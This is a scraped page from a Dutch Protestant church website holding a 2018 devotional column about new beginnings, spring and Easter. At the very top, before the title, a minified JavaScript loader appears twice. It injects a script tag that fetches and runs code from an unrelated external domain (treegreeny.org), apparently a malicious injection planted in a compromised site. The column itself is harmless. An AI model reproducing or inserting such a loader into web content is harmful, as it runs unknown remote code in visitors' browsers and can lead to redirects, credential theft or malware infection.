;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Een nieuw begin - PKN Damwâld

Een nieuw begin

Gepubliceerd op: dinsdag 8 mei 2018

Nu het weer wat warmer wordt, zie je overal tekenen van het voorjaar. De bloemen en planten steken hun kopjes weer op, de bomen botten uit en de vogeltjes fluiten dat het een aard heeft!
Maar ook in het leven van alledag maken we vaak een nieuw begin. Als we naar een andere school gaan, een nieuwe opleiding beginnen, of voor het eerst een baan krijgen. Maar ook als we na jaren iets anders proberen, een verre reis maken, een bedrijf starten of trouwen, kinderen te krijgen.
Iedere verandering is spannend, onbekend, een uitdaging, een nieuwe kans. Soms zien we er naar uit, maar soms ook tegenop. Kunnen we het waar maken, voldoen aan de verwachtingen of de eisen die met de nieuwe stap worden gesteld? Zullen we ons snel vertrouwd voelen, ons kunnen ontplooien? Is er ruimte om te oefenen, groeien, leren, fouten te maken? Of worden we direct afgerekend op wat we doen?
Ook in de kerk leven we in deze tijd na Pasen in een periode van een nieuw begin. Met Pasen denken we aan het grote offer van Jezus, die voor onze zonden stierf en die met Zijn opstanding zorgde voor een nieuw begin voor ons. Hoe bijzonder is dat! Door Zijn leven en dood kunnen en mogen wij altijd weer opnieuw beginnen, met een schone lei. Geen historie, geen fouten die ons worden nagedragen. Zo lang we maar echt oprecht opnieuw willen beginnen en ons openstellen voor God, zijn we bij Hem altijd welkom. Dan kun je leven in het volle vertrouwen dat Hij voor je zorgt, altijd.
Dus ook al sluipt er soms twijfel in je hart, of ben je wat minder betrokken en dwaal je af van de kerk en van God, er is altijd een weg terug, een kans op een nieuw begin. Bij Hem zijn we welkom en mogen we onszelf zijn, elke dag opnieuw!

Columnist:Janet

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns